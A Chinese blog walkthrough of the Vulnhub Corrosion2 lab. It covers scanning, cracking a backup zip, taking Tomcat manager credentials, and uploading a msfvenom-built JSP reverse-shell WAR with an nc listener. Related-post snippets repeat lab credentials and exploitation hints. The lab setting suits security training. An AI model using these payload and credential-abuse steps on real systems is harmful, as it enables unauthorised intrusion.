Corrosion2靶机

最新推荐文章于 2025-08-05 17:02:05 发布
最新推荐文章于 2025-08-05 17:02:05 发布
阅读量129 收藏 2
点赞数 5
CC 4.0 BY-SA版权
文章标签: 服务器 linux 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Paper_F1nd/article/details/149879143

通过nmap进行靶机目标网段(192.168.37.22/24)的存活主机探测

排除到已知ip的机器之后,确认靶机的的ip为192.168.37.131

使用nmap探测主机开放端口及对应服务

确定靶机开放了22、80、8080端口,对应为ssh远程服务和两个web服务,分别打开对应web界面

按照靶机作者枚举的提示,本次使用dirsearch工具进行扫描两个web服务,使用默认字典的进行爆破

readme中说明了系统管理员提供了一些有用的文件,并且应该被加密了

下载backup.zip文件之后,发现这个zip文件是被加密,推测这个文件就是readme.txt中说到的文件。尝试使用fcrackzip利用字典进行破解,成功破解出密码,获取出密码之后,解压zip文件

发现里面存放的tomcat-users.xml文件记录的系统tomcat的manager管理员账户密码

用压缩包中记录的账号密码登录,网站的manager控制后台,发现可以部署直接在线部署war包,可以利用这个点进行shell反弹

sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST="192.168.37.22" LPORT=8888 -f war > jsp_java.war

war构建完成之后,上传war包进行利用

nc -lvp 8888

点击箭头处访问对应连接就能获取到反弹shell了,成功获取到shell

Paper_F1nd
关注
Vulnhub靶机Corrosion1
qq_48904485的博客
01-09 616
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机corrosion:1(10.0.2.12)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/
Corrosion_2
追求卓越,技术流~
01-19 3966
这里写自定义目录标题靶场环境信息收集漏洞利用权力提升总结 靶场环境 攻击机:Kali IP:192.168.247.129 靶机Corrosion_2 IP:192.168.247.137 信息收集 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 07:56 EST Nmap scan report for 192.168.247.137 Host is up (0.00078s latency). Not shown: 65532 clos
Corrosion2靶机攻略
weixin_74124665的博客
08-01 1253
下载完成后直接右击用VM打开,重试一下就可以了右击虚拟机设置将网络连接改成nat模式。
Vulnhub Corrosion2靶机复现
2201_75617121的博客
08-03 275
本文记录了Corrosion2靶机渗透测试过程:首先下载并配置靶机环境,通过nmap扫描发现开放80、22、8080端口。使用dirsearch和gobuster工具进行目录探测,在8080端口发现需密码的压缩包,通过zip2john和john工具破解获得密码@administrator_hi5。解压后获取tomcat-users.xml中的凭证(manager/melehifokivai),成功登录Tomcat管理界面。随后生成JSP木马并打包为war文件上传,通过哥斯拉连接获取shell。
Corrosion2靶机wp
m0_52496313的博客
08-24 609
Corrosion2靶机wp
Corrosion2靶机渗透教程
2301_77839771的博客
08-03 237
查看配置文件 tomcat-users.xml,找到两组账户密码分别为:manager/melehifokivai 和admin/melehifokivai尝试登入,登入成功!得到一个账号:randy 下载backup.zip发现需要密码尝试爆破和Corrosion1一样 得到密码:@administrator_hi5。渗透机:kali IP :192.168.229.129 靶机IP :192.168.229.130。使用命令:nmap -sS -sV -T4 -n -p- 192.168.0.100。
Vulnhub靶机Corrosion 2
qq_48904485的博客
01-10 1154
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
Vulnhub——Corrosion:2靶机
Re1_zf的博客
11-28 403
使用john对压缩包密码进行一下破解zip2john backup.zip > pass.txt //先用zip2john爆出hash文件john --wordlist=/usr/share/wordlists/rockyou.txt //再用john结合字典爆出密码。
Vulnhub_Corrosion2靶机渗透测试
m0_66225311的博客
09-17 312
靶机难度感觉不算大,查看好靶机给的提示,枚举是关键,在爆破压缩包,爆破randy用户密码的时候都有用到新版本的框架,多半已经修复了之前的漏洞,登陆到后台后先查看一下版本信息,搜索一下当前版本是否有漏洞收集好发现的的账号密码,一些提示性的界面,都会有所帮助本次提权使用到的是polkit提权,执行命令调用helper来执行/bin/bash获得root权限。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 Corrosion2 通关详解 (附靶机搭建教程)
qq_51577576的博客
11-01 1530
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 Corrosion2 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub靶场之corrosion2
China_I_LOVE的博客
11-28 763
目录扫描一定要仔细,可能会错过重要信息对于压缩包的密码破解,使用fcrackzip或者john套件都可以tomcat一般对于用户的相关信息可能放在中tomcat中密码多用的可能性还是有的善用发现特权的命令look的一些特权用法可以在网址去查看添加或者移动文件时,要注意文件夹是否有权限unshadow的使用和john密码破解使用sudo -l寻找哪些文件可能有root权限对于python提权的方式有很多,这里是直接本地调用bash,还可以通过反弹获取终端,不过代码可能会麻烦一些。
(VulnHub靶机通关)DC-9
yang1234567898的博客
01-23 916
靶机下载地址:https://download.vulnhub.com/dc/DC-9.zip 主机发现 IP:192.168.43.192 80端口为开放状态,22端口是filtered状态 web渗透 访问80端口的web服务,打开Search界面,输入1' or 1=1 # 存在sql注入 burpsuite抓包然后保存为DC.txt,然后用sqlmap进行爆破 爆库名 python sqlmap.py -r "C:\Users\11989\Desktop\DC.
Web靶机怎么做
03-20
好的,我需要帮用户了解如何制作或搭建用于安全测试的Web靶机。首先,我应该回顾一下用户提供的引用内容... - Vulnhub靶机教程(如Corrosion2、DC-8渗透步骤)[^4]。 - OWASP Top 10漏洞清单(指导漏洞设计)。 ---
VulnHub靶场-Corrosion:1
hxync的博客
08-14 746
靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试一下: 发现确实存在文件包含,上传一句话木马: 命令执行成功: 反弹shell 先监听端口 url编码: 成功拿到shell 在/var/ba
通过filezilla在局域网下实现高速传输数据
Tipriest的博客
08-02 251
本文介绍了FileZilla的安装与使用方法。Linux系统通过apt安装openssh-server,Windows可参考相关教程。使用部分详细说明了WiFi和有线网络两种连接方式,包括IP设置和连通性测试步骤,并展示了20-40MB/s的传输速度。常见问题解答了不同频段WiFi连接和"connection refused"错误的排查方法,提供了相关技术文章的参考链接。文章配有详细的配置截图,便于用户直观理解操作流程。
linux-系统日志查看指令systemctl
最新发布
guchuanhang的专栏
08-05 328
本文介绍了Linux系统管理中的三个重要工具:systemctl用于管理系统服务,包括启动/停止服务和设置开机自启;journalctl用于查看systemd日志,支持按服务筛选和实时跟踪;以及基本日志查看和端口占用检查方法。文中还讲解了.service文件的存放位置差异,提供了常用命令参考和实用技巧,如查看Nginx进程启动时间、日志关键字搜索等。这些工具和技巧能有效帮助管理员进行日常系统维护和故障排查。
宝塔服务器挂载数据盘
ysy1119的博客
08-01 546
打包项目:mvn clean package -DskipTests。测试文件上传:验证文件是否正确存储到 /data/xxx-files。启动应用:java -jar campus-backend.jar。权限正确:目录权限设置正确,应用可以正常读写。自动挂载:重启后自动挂载,无需手动操作。上传到服务器:将jar包上传到服务器。独立存储:文件存储在独立的数据盘上。容量充足:可用空间足够存储大量文件。性能优化:不影响系统盘性能。
Linux选择
m0_74726609的博客
08-01 830
D. systemctl service: service 不是 systemctl 的一级子命令,但 systemctl 可以管理 .service 单元,例如 systemctl start my.service。在systemd中,运行级别的概念被目标(target)单元取代,但类似的逻辑适用:halt.target 对应运行级别0,reboot.target 对应运行级别6。B. ps -a root: -a 选项用于显示所有与终端相关的进程(除了会话领导者和没有控制终端的进程)。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值